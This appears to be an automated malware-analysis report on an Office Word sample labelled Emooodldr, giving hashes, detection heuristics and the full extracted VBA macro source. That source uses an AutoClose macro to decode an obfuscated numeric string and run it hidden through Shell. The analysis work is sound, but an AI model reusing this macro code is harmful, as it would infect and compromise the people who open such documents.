Emooodldr — Office (OOXML) malware analysis

Static analysis result for SHA-256 9248bf0411d30d4f…

MALICIOUS

Office (OOXML)

33.3 KB Created: 2017-10-25 18:34:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2019-08-04
MD5: 7ea4bef65f98165b6d04252025b0c9a5 SHA-1: 11757e130582f7b9ed748f5f870264efa2af618c SHA-256: 9248bf0411d30d4f1616f3a2d7a055b4692c87717033a36ab630ba20ff599489
244 Risk Score

Malware Insights

Emooodldr · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The file is identified as malicious by ClamAV with the signature Doc.Malware.Emooodldr-6711604-0. Static analysis revealed VBA macros, including an Auto_Close macro and a call to the Shell() function. The script attempts to execute a deobfuscated string, likely a second-stage payload, which is characteristic of the Emooodldr family.

Heuristics 6

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2436 bytes
SHA-256: 8b9488b32dcc0c8ef025852e079d51e90ac55091d77bf04578e04f26db729337
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function coppia(positivo As Integer) As String
 Dim civile() As Variant
 civile = Array("s", ")", "T", "O", "?", "u", "X", "-", "h", "d", "$", "E", ",", "/", "W", "f", "o", "g", "m", "r", "A", "(", "l", "P", "+", "I", "b", "3", "V", "t", "j", ";", "F", "i", "N", "n", "D", "1", "'", "4", "a", " ", "x", "y", "=", "w", "8", "e", "p", "H", "v", "B", "\", "S", "C", ".", "c", ":", "2")
 Dim rischio As Integer
 
 For rischio = LBound(civile) To UBound(civile)
   If rischio = positivo Then
    coppia = civile(rischio)
   End If
 Next
 
End Function

Function braccio(uragano As String)
    uragano = StrConv(uragano, vbUnicode)
    braccio = Split(Left(uragano, Len(uragano) - 1), vbNullChar)
End Function

Function supporto(stirpe As String) As String
  Dim inter As Integer
  Dim peggio As String
  Dim mensola As Variant
  mensola = braccio(Trim(stirpe))
  For rischio = 0 To Len(stirpe)
  
    If (rischio + 1) <= UBound(mensola) Then
    Dim volatile As String
    volatile = mensola(rischio)
    rischio = rischio + 1
    volatile = volatile + mensola(rischio)
    
    peggio = peggio + coppia(Int(volatile))
    End If
  Next
  
  supporto = peggio
End Function

Public Function pavone(andrea As String)
  Shell andrea, 0
End Function

Sub AutoClose()
 Call Application.Run("pavone", supporto("561809554742474113564148164547190008472222410711424756415143484000004107341623410754161818403509412134474507032630475629415343002947185534472955144726542233473529015536164535221640093233224721380829294857131340403509474717354047403543555616181335333516130005484719551809153812411047355057202323362002204124413852351843234728304955474247380131415329401929072319165647000041104735505720232336200220385235184323472830495547424738314121344745070326304756294153430029471855344729551447265422334735290155361645352216400953291933351721380829294857131340403509474717354047403543555616181300554808480433094400054847193801314125110621213447450703263047562941534300294718553447295514472654223347352901553616453522164009532919333517213808292948571313273755374639555827395537394613005548084838010131"))
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 11776 bytes
SHA-256: ea4523ee991c62bbbd842fe3d83b73fedaf3d5aceed5c0d28a56640838ce3f3f
Detection
ClamAV: Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).